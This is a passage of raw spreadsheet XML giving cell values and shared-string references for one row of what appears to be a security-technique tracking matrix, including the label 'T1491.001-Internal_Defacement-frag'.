      <c r="UD59" s="184"/>
      <c r="UE59" s="184"/>
      <c r="UF59" s="184"/>
      <c r="UG59" s="184"/>
      <c r="UH59" s="184"/>
      <c r="UI59" s="184"/>
      <c r="UJ59" s="184"/>
      <c r="UK59" s="184"/>
      <c r="UL59" s="184"/>
      <c r="UM59" s="184"/>
      <c r="UN59" s="184"/>
      <c r="UO59" s="184"/>
      <c r="UP59" s="184"/>
      <c r="UQ59" s="184"/>
      <c r="UR59" s="184"/>
      <c r="US59" s="184"/>
      <c r="UT59" s="184"/>
      <c r="UU59" s="184"/>
      <c r="UV59" s="184"/>
      <c r="UW59" s="184"/>
      <c r="UX59" s="184"/>
      <c r="UY59" s="184"/>
      <c r="UZ59" s="184"/>
      <c r="VA59" s="184"/>
      <c r="VB59" s="184"/>
      <c r="VC59" s="184"/>
      <c r="VD59" s="184"/>
      <c r="VE59" s="184"/>
      <c r="VF59" s="184"/>
      <c r="VG59" s="184"/>
      <c r="VH59" s="184"/>
      <c r="VI59" s="184"/>
      <c r="VJ59" s="184"/>
      <c r="VK59" s="184"/>
      <c r="VL59" s="184"/>
      <c r="VM59" s="184"/>
      <c r="VN59" s="184"/>
      <c r="VO59" s="184"/>
      <c r="VP59" s="184"/>
      <c r="VQ59" s="184"/>
      <c r="VR59" s="184"/>
      <c r="VS59" s="184"/>
      <c r="VT59" s="184"/>
      <c r="VU59" s="184"/>
      <c r="VV59" s="184"/>
      <c r="VW59" s="184"/>
      <c r="VX59" s="184"/>
      <c r="VY59" s="184"/>
    </row>
    <row r="60" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A60" s="82" t="s">
        <v>107</v>
      </c>
      <c r="B60" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C60" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D60" s="83" t="s">
        <v>108</v>
      </c>
      <c r="E60" s="83">
        <f t="shared" si="2"/>
        <v>45</v>
      </c>
      <c r="F60" s="83" t="s">
        <v>109</v>
      </c>
      <c r="G60" s="94" t="s">
        <v>1284</v>
      </c>
      <c r="H60" s="83" t="s">
        <v>1285</v>
      </c>
      <c r="I60" s="81" t="s">
        <v>1286</v>
      </c>
      <c r="J60" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K60" s="81" t="s">
        <v>1047</v>
      </c>
      <c r="L60" s="81" t="s">
        <v>1287</v>
      </c>
      <c r="M60" s="378" t="s">
        <v>230</v>
      </c>
      <c r="N60" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O60" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P60" s="91"/>
      <c r="Q60" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R60" s="92" t="s">
        <v>1288</v>
      </c>
      <c r="S60" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T60" s="92" t="s">
        <v>1289</v>
      </c>
      <c r="U60" s="198" t="s">
        <v>1286</v>
      </c>
      <c r="V60" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W60" s="96" t="s">
        <v>1290</v>
      </c>
      <c r="X60" s="196" t="s">
        <v>1291</v>
      </c>
      <c r="Y60" s="83" t="s">
        <v>1292</v>
      </c>
      <c r="Z60" s="188" t="s">
        <v>1293</v>
      </c>
      <c r="AA60" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB60" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC60" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD60" s="83"/>
      <c r="AE60" s="83"/>
      <c r="AF60" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG60" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH60" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI60" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ60" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK60" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL60" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM60" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN60" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO60" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP60" s="385" t="str">
        <f>M60&amp;"-frag"</f>
        <v>T1491.001-Internal_Defacement-frag</v>
      </c>
      <c r="AQ60" s="358">
        <v>12</v>
      </c>
      <c r="AR60" s="100"/>
      <c r="AS60" s="100">
        <v>1</v>
      </c>
      <c r="AT60" s="100">
        <v>1</v>
      </c>
      <c r="AU60" s="100">
        <v>2</v>
      </c>
      <c r="AV60" s="92" t="s">
        <v>910</v>
      </c>
      <c r="AW60" s="100">
        <v>1</v>
      </c>
      <c r="AX60" s="100">
        <v>1</v>
      </c>
      <c r="AY60" s="100">
        <v>1</v>
      </c>
      <c r="AZ60" s="100">
        <v>2</v>
      </c>
      <c r="BA60" s="381" t="s">
        <v>4888</v>
      </c>
      <c r="BB60" s="101">
        <v>5</v>
      </c>
      <c r="BC60" s="102" t="s">
        <v>1815</v>
      </c>
      <c r="BD60" s="102">
        <v>1</v>
      </c>
      <c r="BE60" s="103" t="s">
        <v>336</v>
      </c>
      <c r="BF60" s="103">
        <v>1</v>
      </c>
      <c r="BG60" s="104">
        <v>1</v>
      </c>
      <c r="BH60" s="105">
        <v>2</v>
      </c>
      <c r="BI60" s="106" t="s">
        <v>1863</v>
      </c>
      <c r="BJ60" s="497">
        <v>2</v>
      </c>
      <c r="BK60" s="107" t="s">
        <v>1845</v>
      </c>
      <c r="BL60" s="107">
        <v>2</v>
      </c>
      <c r="BM60" s="108">
        <v>1</v>
      </c>
      <c r="BN60" s="109">
        <v>7</v>
      </c>
      <c r="BO60" s="110" t="s">
        <v>2026</v>
      </c>
      <c r="BP60" s="501">
        <v>3</v>
      </c>
      <c r="BQ60" s="111" t="s">
        <v>1987</v>
      </c>
      <c r="BR60" s="111">
        <v>3</v>
      </c>
      <c r="BS60" s="112">
        <v>1</v>
      </c>
      <c r="BT60" s="113">
        <v>18</v>
      </c>
      <c r="BU60" s="114" t="s">
        <v>3397</v>
      </c>
      <c r="BV60" s="503">
        <v>5</v>
      </c>
      <c r="BW60" s="115" t="s">
        <v>3398</v>
      </c>
      <c r="BX60" s="115">
        <v>3</v>
      </c>
      <c r="BY60" s="116">
        <v>4</v>
      </c>
      <c r="BZ60" s="250">
        <v>7</v>
      </c>
      <c r="CA60" s="251" t="s">
        <v>3399</v>
      </c>
      <c r="CB60" s="505">
        <v>5</v>
      </c>
      <c r="CC60" s="252" t="s">
        <v>3400</v>
      </c>
      <c r="CD60" s="252">
        <v>5</v>
      </c>
      <c r="CE60" s="253">
        <v>1</v>
      </c>
      <c r="CF60" s="101">
        <v>25</v>
      </c>
      <c r="CG60" s="102" t="s">
        <v>3401</v>
      </c>
      <c r="CH60" s="102">
        <v>10</v>
      </c>
      <c r="CI60" s="103" t="s">
        <v>3402</v>
      </c>
      <c r="CJ60" s="103">
        <v>8</v>
      </c>
      <c r="CK60" s="104">
        <v>4</v>
      </c>
      <c r="CL60" s="105">
        <v>0</v>
      </c>
      <c r="CM60" s="106">
        <v>0</v>
      </c>
      <c r="CN60" s="497">
        <v>0</v>
      </c>
      <c r="CO60" s="107">
        <v>0</v>
      </c>
      <c r="CP60" s="107">
        <v>0</v>
      </c>
      <c r="CQ60" s="108">
        <v>0</v>
      </c>
      <c r="CR60" s="109">
        <v>12</v>
      </c>
      <c r="CS60" s="110" t="s">
        <v>1941</v>
      </c>
      <c r="CT60" s="501">
        <v>3</v>
      </c>
      <c r="CU60" s="111" t="s">
        <v>1933</v>
      </c>
      <c r="CV60" s="111">
        <v>1</v>
      </c>
      <c r="CW60" s="112">
        <v>3</v>
      </c>
      <c r="CX60" s="113">
        <v>19</v>
      </c>
      <c r="CY60" s="114" t="s">
        <v>2167</v>
      </c>
      <c r="CZ60" s="503">
        <v>6</v>
      </c>
      <c r="DA60" s="115" t="s">
        <v>2168</v>
      </c>
      <c r="DB60" s="115">
        <v>4</v>
      </c>
      <c r="DC60" s="116">
        <v>4</v>
      </c>
      <c r="DD60" s="101">
        <v>0</v>
      </c>
      <c r="DE60" s="102">
        <v>0</v>
      </c>
      <c r="DF60" s="102">
        <v>0</v>
      </c>
      <c r="DG60" s="103">
        <v>0</v>
      </c>
      <c r="DH60" s="103">
        <v>0</v>
      </c>
      <c r="DI60" s="104">
        <v>0</v>
      </c>
      <c r="DJ60" s="105">
        <v>1</v>
      </c>
      <c r="DK60" s="106" t="s">
        <v>3367</v>
      </c>
      <c r="DL60" s="497">
        <v>1</v>
      </c>
      <c r="DM60" s="107" t="s">
        <v>2646</v>
      </c>
      <c r="DN60" s="107">
        <v>1</v>
      </c>
      <c r="DO60" s="108">
        <v>1</v>
      </c>
      <c r="DP60" s="109">
        <v>1</v>
      </c>
      <c r="DQ60" s="110" t="s">
        <v>3367</v>
      </c>
      <c r="DR60" s="501">
        <v>1</v>
      </c>
      <c r="DS60" s="111" t="s">
        <v>2646</v>
      </c>
      <c r="DT60" s="111">
        <v>1</v>
      </c>
      <c r="DU60" s="112">
        <v>1</v>
      </c>
      <c r="DV60" s="113">
        <v>1</v>
      </c>
      <c r="DW60" s="114" t="s">
        <v>3403</v>
      </c>
      <c r="DX60" s="503">
        <v>1</v>
      </c>
      <c r="DY60" s="115" t="s">
        <v>3404</v>
      </c>
      <c r="DZ60" s="115">
        <v>1</v>
      </c>
      <c r="EA60" s="116">
        <v>1</v>
      </c>
      <c r="EB60" s="250">
        <v>2</v>
      </c>
      <c r="EC60" s="251" t="s">
        <v>3405</v>
      </c>
      <c r="ED60" s="505">
        <v>2</v>
      </c>
      <c r="EE60" s="252" t="s">
        <v>2650</v>
      </c>
      <c r="EF60" s="252">
        <v>2</v>
      </c>
      <c r="EG60" s="253">
        <v>1</v>
      </c>
      <c r="EH60" s="101">
        <v>3</v>
      </c>
      <c r="EI60" s="102" t="s">
        <v>3406</v>
      </c>
      <c r="EJ60" s="102">
        <v>3</v>
      </c>
      <c r="EK60" s="103" t="s">
        <v>3407</v>
      </c>
      <c r="EL60" s="103">
        <v>3</v>
      </c>
      <c r="EM60" s="104">
        <v>1</v>
      </c>
      <c r="EN60" s="105">
        <v>0</v>
      </c>
      <c r="EO60" s="106">
        <v>0</v>
      </c>
      <c r="EP60" s="497">
        <v>0</v>
      </c>
      <c r="EQ60" s="107">
        <v>0</v>
      </c>
      <c r="ER60" s="107">
        <v>0</v>
      </c>
      <c r="ES60" s="108">
        <v>0</v>
      </c>
      <c r="ET60" s="109">
        <v>0</v>
      </c>
      <c r="EU60" s="110">
        <v>0</v>
      </c>
      <c r="EV60" s="501">
        <v>0</v>
      </c>
      <c r="EW60" s="111">
        <v>0</v>
      </c>
      <c r="EX60" s="111">
        <v>0</v>
      </c>
      <c r="EY60" s="112">
        <v>0</v>
      </c>
      <c r="EZ60" s="113">
        <v>1</v>
      </c>
      <c r="FA60" s="114" t="s">
        <v>3367</v>
      </c>
      <c r="FB60" s="503">
        <v>1</v>
      </c>
      <c r="FC60" s="115" t="s">
        <v>2646</v>
      </c>
      <c r="FD60" s="115">
        <v>1</v>
      </c>
      <c r="FE60" s="116">
        <v>1</v>
      </c>
      <c r="FF60" s="101">
        <v>5</v>
      </c>
      <c r="FG60" s="102" t="s">
        <v>1815</v>
      </c>
      <c r="FH60" s="102">
        <v>1</v>
      </c>
      <c r="FI60" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ60" s="103">
        <v>1</v>
      </c>
      <c r="FK60" s="104">
        <v>1</v>
      </c>
      <c r="FL60" s="105">
        <v>0</v>
      </c>
      <c r="FM60" s="106">
        <v>0</v>
      </c>
      <c r="FN60" s="497">
        <v>0</v>
      </c>
      <c r="FO60" s="107">
        <v>0</v>
      </c>
      <c r="FP60" s="107">
        <v>0</v>
      </c>
      <c r="FQ60" s="108">
        <v>0</v>
      </c>
      <c r="FR60" s="109">
        <v>5</v>
      </c>
      <c r="FS60" s="110" t="s">
        <v>1815</v>
      </c>
      <c r="FT60" s="501">
        <v>1</v>
      </c>
      <c r="FU60" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV60" s="111">
        <v>1</v>
      </c>
      <c r="FW60" s="112">
        <v>1</v>
      </c>
      <c r="FX60" s="113">
        <v>5</v>
      </c>
      <c r="FY60" s="114" t="s">
        <v>1815</v>
      </c>
      <c r="FZ60" s="503">
        <v>1</v>
      </c>
      <c r="GA60" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB60" s="115">
        <v>1</v>
      </c>
      <c r="GC60" s="116">
        <v>1</v>
      </c>
      <c r="GD60" s="250">
        <v>4</v>
      </c>
      <c r="GE60" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF60" s="505">
        <v>2</v>
      </c>
      <c r="GG60" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH60" s="252">
        <v>2</v>
      </c>
      <c r="GI60" s="253">
        <v>1</v>
      </c>
      <c r="GJ60" s="101">
        <v>9</v>
      </c>
      <c r="GK60" s="102" t="s">
        <v>2975</v>
      </c>
      <c r="GL60" s="102">
        <v>3</v>
      </c>
      <c r="GM60" s="103" t="s">
        <v>2565</v>
      </c>
      <c r="GN60" s="103">
        <v>3</v>
      </c>
      <c r="GO60" s="104">
        <v>1</v>
      </c>
      <c r="GP60" s="105">
        <v>0</v>
      </c>
      <c r="GQ60" s="106">
        <v>0</v>
      </c>
      <c r="GR60" s="497">
        <v>0</v>
      </c>
      <c r="GS60" s="107">
        <v>0</v>
      </c>
      <c r="GT60" s="107">
        <v>0</v>
      </c>
      <c r="GU60" s="108">
        <v>0</v>
      </c>
      <c r="GV60" s="109">
        <v>0</v>
      </c>
      <c r="GW60" s="110">
        <v>0</v>
      </c>
      <c r="GX60" s="501">
        <v>0</v>
      </c>
      <c r="GY60" s="111">
        <v>0</v>
      </c>
      <c r="GZ60" s="111">
        <v>0</v>
      </c>
      <c r="HA60" s="112">
        <v>0</v>
      </c>
      <c r="HB60" s="113">
        <v>5</v>
      </c>
      <c r="HC60" s="114" t="s">
        <v>1815</v>
      </c>
      <c r="HD60" s="503">
        <v>1</v>
      </c>
      <c r="HE60" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF60" s="115">
        <v>1</v>
      </c>
      <c r="HG60" s="116">
        <v>1</v>
      </c>
      <c r="HH60" s="101">
        <v>0</v>
      </c>
      <c r="HI60" s="102">
        <v>0</v>
      </c>
      <c r="HJ60" s="102">
        <v>0</v>
      </c>
      <c r="HK60" s="103">
        <v>0</v>
      </c>
      <c r="HL60" s="103">
        <v>0</v>
      </c>
      <c r="HM60" s="104">
        <v>0</v>
      </c>
      <c r="HN60" s="105">
        <v>1</v>
      </c>
      <c r="HO60" s="106" t="s">
        <v>3408</v>
      </c>
      <c r="HP60" s="497">
        <v>1</v>
      </c>
      <c r="HQ60" s="107" t="s">
        <v>2657</v>
      </c>
      <c r="HR60" s="107">
        <v>1</v>
      </c>
      <c r="HS60" s="108">
        <v>1</v>
      </c>
      <c r="HT60" s="109">
        <v>1</v>
      </c>
      <c r="HU60" s="110" t="s">
        <v>3408</v>
      </c>
      <c r="HV60" s="501">
        <v>1</v>
      </c>
      <c r="HW60" s="111" t="s">
        <v>2657</v>
      </c>
      <c r="HX60" s="111">
        <v>1</v>
      </c>
      <c r="HY60" s="112">
        <v>1</v>
      </c>
      <c r="HZ60" s="113">
        <v>12</v>
      </c>
      <c r="IA60" s="114" t="s">
        <v>1941</v>
      </c>
      <c r="IB60" s="503">
        <v>3</v>
      </c>
      <c r="IC60" s="115" t="s">
        <v>1933</v>
      </c>
      <c r="ID60" s="115">
        <v>1</v>
      </c>
      <c r="IE60" s="116">
        <v>3</v>
      </c>
      <c r="IF60" s="250">
        <v>1</v>
      </c>
      <c r="IG60" s="251" t="s">
        <v>3408</v>
      </c>
      <c r="IH60" s="505">
        <v>1</v>
      </c>
      <c r="II60" s="252" t="s">
        <v>2657</v>
      </c>
      <c r="IJ60" s="252">
        <v>1</v>
      </c>
      <c r="IK60" s="253">
        <v>1</v>
      </c>
      <c r="IL60" s="101">
        <v>13</v>
      </c>
      <c r="IM60" s="102" t="s">
        <v>3409</v>
      </c>
      <c r="IN60" s="102">
        <v>4</v>
      </c>
      <c r="IO60" s="103" t="s">
        <v>3410</v>
      </c>
      <c r="IP60" s="103">
        <v>2</v>
      </c>
      <c r="IQ60" s="104">
        <v>4</v>
      </c>
      <c r="IR60" s="105">
        <v>0</v>
      </c>
      <c r="IS60" s="106">
        <v>0</v>
      </c>
      <c r="IT60" s="497">
        <v>0</v>
      </c>
      <c r="IU60" s="107">
        <v>0</v>
      </c>
      <c r="IV60" s="107">
        <v>0</v>
      </c>
      <c r="IW60" s="108">
        <v>0</v>
      </c>
      <c r="IX60" s="109">
        <v>12</v>
      </c>
      <c r="IY60" s="110" t="s">
        <v>1941</v>
      </c>
      <c r="IZ60" s="501">
        <v>3</v>
      </c>
      <c r="JA60" s="111" t="s">
        <v>1933</v>
      </c>
      <c r="JB60" s="111">
        <v>1</v>
      </c>
      <c r="JC60" s="112">
        <v>3</v>
      </c>
      <c r="JD60" s="113">
        <v>13</v>
      </c>
      <c r="JE60" s="114" t="s">
        <v>3409</v>
      </c>
      <c r="JF60" s="503">
        <v>4</v>
      </c>
      <c r="JG60" s="115" t="s">
        <v>3410</v>
      </c>
      <c r="JH60" s="115">
        <v>2</v>
      </c>
      <c r="JI60" s="116">
        <v>4</v>
      </c>
      <c r="JJ60" s="101">
        <v>0</v>
      </c>
      <c r="JK60" s="102">
        <v>0</v>
      </c>
      <c r="JL60" s="102">
        <v>0</v>
      </c>
      <c r="JM60" s="103">
        <v>0</v>
      </c>
      <c r="JN60" s="103">
        <v>0</v>
      </c>
      <c r="JO60" s="104">
        <v>0</v>
      </c>
      <c r="JP60" s="105">
        <v>0</v>
      </c>
      <c r="JQ60" s="106">
        <v>0</v>
      </c>
      <c r="JR60" s="497">
        <v>0</v>
      </c>
      <c r="JS60" s="107">
        <v>0</v>
      </c>
      <c r="JT60" s="107">
        <v>0</v>
      </c>
      <c r="JU60" s="108">
        <v>0</v>
      </c>
      <c r="JV60" s="109">
        <v>0</v>
      </c>
      <c r="JW60" s="110">
        <v>0</v>
      </c>
      <c r="JX60" s="501">
        <v>0</v>
      </c>
      <c r="JY60" s="111">
        <v>0</v>
      </c>
      <c r="JZ60" s="111">
        <v>0</v>
      </c>
      <c r="KA60" s="112">
        <v>0</v>
      </c>
      <c r="KB60" s="113">
        <v>0</v>
      </c>
      <c r="KC60" s="114">
        <v>0</v>
      </c>
      <c r="KD60" s="503">
        <v>0</v>
      </c>
      <c r="KE60" s="115">
        <v>0</v>
      </c>
      <c r="KF60" s="115">
        <v>0</v>
      </c>
      <c r="KG60" s="116">
        <v>0</v>
      </c>
      <c r="KH60" s="250">
        <v>0</v>
      </c>
      <c r="KI60" s="251">
        <v>0</v>
      </c>
      <c r="KJ60" s="505">
        <v>0</v>
      </c>
      <c r="KK60" s="252">
        <v>0</v>
      </c>
      <c r="KL60" s="252">
        <v>0</v>
      </c>
      <c r="KM60" s="253">
        <v>0</v>
      </c>
      <c r="KN60" s="101">
        <v>0</v>
      </c>
      <c r="KO60" s="102">
        <v>0</v>
      </c>
      <c r="KP60" s="102">
        <v>0</v>
      </c>
      <c r="KQ60" s="103">
        <v>0</v>
      </c>
      <c r="KR60" s="103">
        <v>0</v>
      </c>
      <c r="KS60" s="104">
        <v>0</v>
      </c>
      <c r="KT60" s="105">
        <v>0</v>
      </c>
      <c r="KU60" s="106">
        <v>0</v>
      </c>
      <c r="KV60" s="497">
        <v>0</v>
      </c>
      <c r="KW60" s="107">
        <v>0</v>
      </c>
      <c r="KX60" s="107">
        <v>0</v>
      </c>
      <c r="KY60" s="108">
        <v>0</v>
      </c>
      <c r="KZ60" s="109">
        <v>0</v>
      </c>
      <c r="LA60" s="110">
        <v>0</v>
      </c>
      <c r="LB60" s="501">
        <v>0</v>
      </c>
      <c r="LC60" s="111">
        <v>0</v>
      </c>
      <c r="LD60" s="111">
        <v>0</v>
      </c>
      <c r="LE60" s="112">
        <v>0</v>
      </c>
      <c r="LF60" s="113">
        <v>0</v>
      </c>
      <c r="LG60" s="114">
        <v>0</v>
      </c>
      <c r="LH60" s="503">
        <v>0</v>
      </c>
      <c r="LI60" s="115">
        <v>0</v>
      </c>
      <c r="LJ60" s="115">
        <v>0</v>
      </c>
      <c r="LK60" s="116">
        <v>0</v>
      </c>
      <c r="LL60" s="117">
        <v>10</v>
      </c>
      <c r="LM60" s="507">
        <v>9</v>
      </c>
      <c r="LN60" s="119">
        <v>2</v>
      </c>
      <c r="LO60" s="119">
        <v>4</v>
      </c>
      <c r="LP60" s="119">
        <v>8</v>
      </c>
      <c r="LQ60" s="119">
        <v>1</v>
      </c>
      <c r="LR60" s="119">
        <v>7</v>
      </c>
      <c r="LS60" s="119">
        <v>8</v>
      </c>
      <c r="LT60" s="382"/>
      <c r="LU60" s="117">
        <v>0</v>
      </c>
      <c r="LV60" s="118">
        <v>0</v>
      </c>
      <c r="LW60" s="507">
        <v>0</v>
      </c>
      <c r="LX60" s="119">
        <v>0</v>
      </c>
      <c r="LY60" s="119">
        <v>0</v>
      </c>
      <c r="LZ60" s="119">
        <v>0</v>
      </c>
      <c r="MA60" s="117">
        <v>0</v>
      </c>
      <c r="MB60" s="118">
        <v>0</v>
      </c>
      <c r="MC60" s="507">
        <v>0</v>
      </c>
      <c r="MD60" s="119">
        <v>0</v>
      </c>
      <c r="ME60" s="119">
        <v>0</v>
      </c>
      <c r="MF60" s="119">
        <v>0</v>
      </c>
      <c r="MG60" s="117">
        <v>0</v>
      </c>
      <c r="MH60" s="118">
        <v>0</v>
      </c>
      <c r="MI60" s="507">
        <v>0</v>
      </c>
      <c r="MJ60" s="119">
        <v>0</v>
      </c>
      <c r="MK60" s="119">
        <v>0</v>
      </c>
      <c r="ML60" s="119">
        <v>0</v>
      </c>
      <c r="MM60" s="117">
        <v>0</v>
      </c>
      <c r="MN60" s="118">
        <v>0</v>
      </c>
      <c r="MO60" s="507">
        <v>0</v>
      </c>
      <c r="MP60" s="119">
        <v>0</v>
      </c>
      <c r="MQ60" s="119">
        <v>0</v>
      </c>
      <c r="MR60" s="119">
        <v>0</v>
      </c>
      <c r="MS60" s="117">
        <v>3</v>
      </c>
      <c r="MT60" s="118" t="s">
        <v>4239</v>
      </c>
      <c r="MU60" s="507">
        <v>2</v>
      </c>
      <c r="MV60" s="119" t="s">
        <v>2586</v>
      </c>
      <c r="MW60" s="119">
        <v>2</v>
      </c>
      <c r="MX60" s="119">
        <v>1</v>
      </c>
      <c r="MY60" s="117">
        <v>0</v>
      </c>
      <c r="MZ60" s="118">
        <v>0</v>
      </c>
      <c r="NA60" s="507">
        <v>0</v>
      </c>
      <c r="NB60" s="119">
        <v>0</v>
      </c>
      <c r="NC60" s="119">
        <v>0</v>
      </c>
      <c r="ND60" s="119">
        <v>0</v>
      </c>
      <c r="NE60" s="117">
        <v>0</v>
      </c>
      <c r="NF60" s="118">
        <v>0</v>
      </c>
      <c r="NG60" s="507">
        <v>0</v>
      </c>
      <c r="NH60" s="119">
        <v>0</v>
      </c>
      <c r="NI60" s="119">
        <v>0</v>
      </c>
      <c r="NJ60" s="119">
        <v>0</v>
      </c>
      <c r="NK60" s="117">
        <v>0</v>
      </c>
      <c r="NL60" s="118">
        <v>0</v>
      </c>
      <c r="NM60" s="507">
        <v>0</v>
      </c>
      <c r="NN60" s="119">
        <v>0</v>
      </c>
      <c r="NO60" s="119">
        <v>0</v>
      </c>
      <c r="NP60" s="119">
        <v>0</v>
      </c>
      <c r="NQ60" s="117">
        <v>0</v>
      </c>
      <c r="NR60" s="118">
        <v>0</v>
      </c>
      <c r="NS60" s="507">
        <v>0</v>
      </c>
      <c r="NT60" s="119">
        <v>0</v>
      </c>
      <c r="NU60" s="119">
        <v>0</v>
      </c>
      <c r="NV60" s="119">
        <v>0</v>
      </c>
      <c r="NW60" s="117">
        <v>7</v>
      </c>
      <c r="NX60" s="118" t="s">
        <v>4380</v>
      </c>
      <c r="NY60" s="507">
        <v>7</v>
      </c>
      <c r="NZ60" s="119" t="s">
        <v>4381</v>
      </c>
      <c r="OA60" s="119">
        <v>4</v>
      </c>
      <c r="OB60" s="119">
        <v>7</v>
      </c>
      <c r="OC60" s="120">
        <v>0</v>
      </c>
      <c r="OD60" s="120">
        <v>0</v>
      </c>
      <c r="OE60" s="120">
        <v>0</v>
      </c>
      <c r="OF60" s="121">
        <v>0</v>
      </c>
      <c r="OG60" s="120">
        <v>0</v>
      </c>
      <c r="OH60" s="120">
        <v>0</v>
      </c>
      <c r="OI60" s="120">
        <v>0</v>
      </c>
      <c r="OJ60" s="120">
        <v>0</v>
      </c>
      <c r="OK60" s="383"/>
      <c r="OL60" s="120">
        <v>0</v>
      </c>
      <c r="OM60" s="120">
        <v>0</v>
      </c>
      <c r="ON60" s="120">
        <v>0</v>
      </c>
      <c r="OO60" s="195"/>
      <c r="OP60" s="195">
        <v>0</v>
      </c>
      <c r="OQ60" s="464">
        <v>0</v>
      </c>
      <c r="OR60" s="120">
        <v>0</v>
      </c>
      <c r="OS60" s="120">
        <v>0</v>
      </c>
      <c r="OT60" s="120">
        <v>0</v>
      </c>
      <c r="OU60" s="195"/>
      <c r="OV60" s="195">
        <v>0</v>
      </c>
      <c r="OW60" s="464">
        <v>0</v>
      </c>
      <c r="OX60" s="120">
        <v>0</v>
      </c>
      <c r="OY60" s="120">
        <v>0</v>
      </c>
      <c r="OZ60" s="120">
        <v>0</v>
      </c>
      <c r="PA60" s="195"/>
      <c r="PB60" s="195">
        <v>0</v>
      </c>
      <c r="PC60" s="464">
        <v>0</v>
      </c>
      <c r="PD60" s="120">
        <v>0</v>
      </c>
      <c r="PE60" s="120">
        <v>0</v>
      </c>
      <c r="PF60" s="120">
        <v>0</v>
      </c>
      <c r="PG60" s="195"/>
      <c r="PH60" s="195">
        <v>0</v>
      </c>
      <c r="PI60" s="464">
        <v>0</v>
      </c>
      <c r="PJ60" s="120">
        <v>0</v>
      </c>
      <c r="PK60" s="120">
        <v>0</v>
      </c>
      <c r="PL60" s="120">
        <v>0</v>
      </c>
      <c r="PM60" s="195"/>
      <c r="PN60" s="195">
        <v>0</v>
      </c>
      <c r="PO60" s="464">
        <v>0</v>
      </c>
      <c r="PP60" s="120">
        <v>0</v>
      </c>
      <c r="PQ60" s="120">
        <v>0</v>
      </c>
      <c r="PR60" s="120">
        <v>0</v>
      </c>
      <c r="PS60" s="195"/>
      <c r="PT60" s="195">
        <v>0</v>
      </c>
      <c r="PU60" s="464">
        <v>0</v>
      </c>
      <c r="PV60" s="120">
        <v>0</v>
      </c>
      <c r="PW60" s="120">
        <v>0</v>
      </c>
      <c r="PX60" s="120">
        <v>0</v>
      </c>
      <c r="PY60" s="195"/>
      <c r="PZ60" s="195">
        <v>0</v>
      </c>
      <c r="QA60" s="464">
        <v>0</v>
      </c>
      <c r="QB60" s="120">
        <v>0</v>
      </c>
      <c r="QC60" s="120">
        <v>0</v>
      </c>
      <c r="QD60" s="120">
        <v>0</v>
      </c>
      <c r="QE60" s="195"/>
      <c r="QF60" s="195">
        <v>0</v>
      </c>
      <c r="QG60" s="464">
        <v>0</v>
      </c>
      <c r="QH60" s="120">
        <v>0</v>
      </c>
      <c r="QI60" s="120">
        <v>0</v>
      </c>
      <c r="QJ60" s="120">
        <v>0</v>
      </c>
      <c r="QK60" s="195"/>
      <c r="QL60" s="195">
        <v>0</v>
      </c>
      <c r="QM60" s="464">
        <v>0</v>
      </c>
      <c r="QN60" s="120">
        <v>0</v>
      </c>
      <c r="QO60" s="120">
        <v>0</v>
      </c>
      <c r="QP60" s="120">
        <v>0</v>
      </c>
      <c r="QQ60" s="195"/>
      <c r="QR60" s="195">
        <v>0</v>
      </c>
      <c r="QS60" s="464">
        <v>0</v>
      </c>
      <c r="QT60" s="184"/>
      <c r="QU60" s="184"/>
      <c r="QV60" s="184"/>
      <c r="QW60" s="184"/>
      <c r="QX60" s="184"/>
      <c r="QY60" s="184"/>
      <c r="QZ60" s="184"/>
      <c r="RA60" s="184"/>
      <c r="RB60" s="184"/>
      <c r="RC60" s="184"/>
      <c r="RD60" s="184"/>
      <c r="RE60" s="184"/>
      <c r="RF60" s="184"/>
      <c r="RG60" s="184"/>
      <c r="RH60" s="184"/>
      <c r="RI60" s="184"/>
      <c r="RJ60" s="184"/>
      <c r="RK60" s="184"/>
      <c r="RL60" s="184"/>
      <c r="RM60" s="184"/>
      <c r="RN60" s="184"/>
      <c r="RO60" s="184"/>
      <c r="RP60" s="184"/>
      <c r="RQ60" s="184"/>
      <c r="RR60" s="184"/>
      <c r="RS60" s="184"/>
      <c r="RT60" s="184"/>
      <c r="RU60" s="184"/>
      <c r="RV60" s="184"/>
      <c r="RW60" s="184"/>
      <c r="RX60" s="184"/>
      <c r="RY60" s="184"/>
      <c r="RZ60" s="184"/>
      <c r="SA60" s="184"/>
      <c r="SB60" s="184"/>
      <c r="SC60" s="184"/>
      <c r="SD60" s="184"/>
      <c r="SE60" s="184"/>
      <c r="SF60" s="184"/>
      <c r="SG60" s="184"/>
      <c r="SH60" s="184"/>
      <c r="SI60" s="184"/>
      <c r="SJ60" s="184"/>
      <c r="SK60" s="184"/>
      <c r="SL60" s="184"/>
      <c r="SM60" s="184"/>
      <c r="SN60" s="184"/>
      <c r="SO60" s="184"/>
      <c r="SP60" s="184"/>
      <c r="SQ60" s="184"/>
      <c r="SR60" s="184"/>
      <c r="SS60" s="184"/>
      <c r="ST60" s="184"/>
      <c r="SU60" s="184"/>
      <c r="SV60" s="184"/>
      <c r="SW60" s="184"/>
